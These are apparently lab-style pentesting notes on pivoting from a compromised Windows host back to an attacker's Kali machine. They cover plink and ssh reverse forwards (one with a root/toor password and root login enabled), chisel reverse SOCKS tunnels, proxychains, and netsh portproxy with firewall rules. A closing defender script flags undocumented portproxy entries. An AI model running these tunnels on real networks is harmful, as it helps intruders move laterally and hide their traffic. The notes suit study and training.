Plink
First: we need to change the ssh server configuration (/etc/ssh/sshd_config) on our kali machine.
PermitRootLogin no    # change this
PermitRootLogin yes   # to this
# then restart the service
sudo service ssh restart
We can use a different port if port 22 is blocked on the remote machine (the command below uses 2222).
Second: run the plink command on the victim machine:
plink.exe -P 2222 -l root -pw toor -R 445:127.0.0.1:445 10.10.14.12
Plink with id_rsa
Generate a key pair with ssh-keygen and append the .pub value to authorized_keys.
Install putty-tools and convert id_rsa to a .ppk file:
└─$ sudo apt install putty-tools
└─$ puttygen id_rsa -o key.ppk
Transfer key.ppk to the Windows machine we compromised.
On the Windows machine, use plink to connect back to our kali machine for the reverse port forward:
Desktop>plink.exe -R 445:192.168.33.132:445 pwned@10.104.60.242 -i key.ppk -N
Using username "pwned".
Access granted. Press Return to begin session.
We can then reach the forwarded service via 127.0.0.1:445 on our kali machine.
Chisel
On the kali machine:
./chisel server -p 6666 --socks5 --reverse
On the Windows server machine:
chisel.exe client 10.10.10.10:6666 R:1080:socks
Then we can use proxychains to reach the target machine through the SOCKS proxy:
proxychains xfreerdp /u:user /p:password123 /cert:ignore /v:10.10.10.11
Proxychains on a Windows machine
Generate a key pair with ssh-keygen without a passphrase. It creates two files, id_rsa and id_rsa.pub.
Copy the value of id_rsa.pub and paste it into the .ssh/authorized_keys file.
Transfer the id_rsa file to the Windows machine we compromised.
Connect via ssh back to our kali machine:
ssh -R 9050 pwned@10.104.60.242 -i id_rsa -f -N
Our kali machine will then listen on port 9050 (a reverse dynamic forward, which acts as a SOCKS proxy).
Alternatively with chisel:
└─$ chisel server -p 8888 --reverse &
chisel-window.exe client 10.104.60.242:8888 R:9050:socks &
2022/05/10 03:18:16 client: Connecting to ws://10.104.60.242:8888
2022/05/10 03:18:16 client: Connected (Latency 153.9µs)
In /etc/proxychains4.conf:
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 9050
Netsh
netsh interface portproxy add v4tov4 listenaddress= listenport= connectaddress= connectport= protocol=tcp
Where:
listenaddress is the IP address to listen on (probably always 0.0.0.0).
listenport is the port to listen on.
connectaddress is the destination IP address.
connectport is the destination port.
protocol is the protocol to use (always TCP).
Example:
PS C:\Users\Public> netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=80 connectaddress=192.168.10.1 connectport=80 protocol=tcp
PS C:\Users\Public> netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=443 connectaddress=192.168.10.1 connectport=443 protocol=tcp
Show the portproxy:
PS C:\>netsh interface portproxy show v4tov4
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
0.0.0.0         80          192.168.10.1    80
0.0.0.0         443         192.168.10.1    443
Remove the portproxy:
PS C:\>netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=80
PS C:\>netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=443
Create a local firewall rule before netsh:
PS C:\>New-NetFirewallRule -DisplayName "80-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 80
PS C:\>New-NetFirewallRule -DisplayName "443-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 443
Remove the local firewall rule:
PS C:\>Remove-NetFirewallRule -DisplayName "80-In"
PS C:\>Remove-NetFirewallRule -DisplayName "443-In"
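Because netsh portproxy entries survive reboots (they are stored under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy), a defender auditing a host wants the output of `netsh interface portproxy show v4tov4` as structured records rather than a table to eyeball. The following Python is an added example, not part of the original notes: it parses the show output in the layout quoted above and flags any forward that is not on an expected allowlist. The sample output and the allowlist are constructed for the example.

```python
"""Parse `netsh interface portproxy show v4tov4` output and flag unexpected forwards.

Added defender-side example; not part of the original notes. The sample
output below is constructed to match the layout of the netsh table above.
"""
import re
from dataclasses import dataclass
from typing import List, Set, Tuple

# Constructed sample in the same layout as the netsh output quoted above.
SAMPLE_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
0.0.0.0         80          192.168.10.1    80
0.0.0.0         443         192.168.10.1    443
"""

# A data row is: <listen address> <listen port> <connect address> <connect port>.
# Header, separator and blank lines never match because the port columns
# must be all digits.
ROW_RE = re.compile(
    r"^\s*(?P<laddr>\S+)\s+(?P<lport>\d+)\s+(?P<caddr>\S+)\s+(?P<cport>\d+)\s*$"
)


@dataclass(frozen=True)
class PortProxy:
    listen_address: str
    listen_port: int
    connect_address: str
    connect_port: int


def parse_portproxy(text: str) -> List[PortProxy]:
    """Return one PortProxy per data row in the netsh show output."""
    rules = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue  # header, separator or blank line
        rules.append(
            PortProxy(m["laddr"], int(m["lport"]), m["caddr"], int(m["cport"]))
        )
    return rules


# Allowlist entries are (listen_port, connect_address, connect_port).
Allowlist = Set[Tuple[int, str, int]]


def unexpected_forwards(rules: List[PortProxy], allowlist: Allowlist) -> List[PortProxy]:
    """Return the forwards that are not covered by the allowlist."""
    return [
        r for r in rules
        if (r.listen_port, r.connect_address, r.connect_port) not in allowlist
    ]


if __name__ == "__main__":
    # Constructed allowlist: only the port-80 forward is expected on this host.
    expected: Allowlist = {(80, "192.168.10.1", 80)}
    for rule in unexpected_forwards(parse_portproxy(SAMPLE_OUTPUT), expected):
        print(
            f"ALERT: unexpected portproxy {rule.listen_address}:{rule.listen_port}"
            f" -> {rule.connect_address}:{rule.connect_port}"
        )
```

Run it against the real `netsh interface portproxy show v4tov4` output (captured to a file or piped in) and keep the allowlist in your configuration management; any entry it prints is a forward nobody documented.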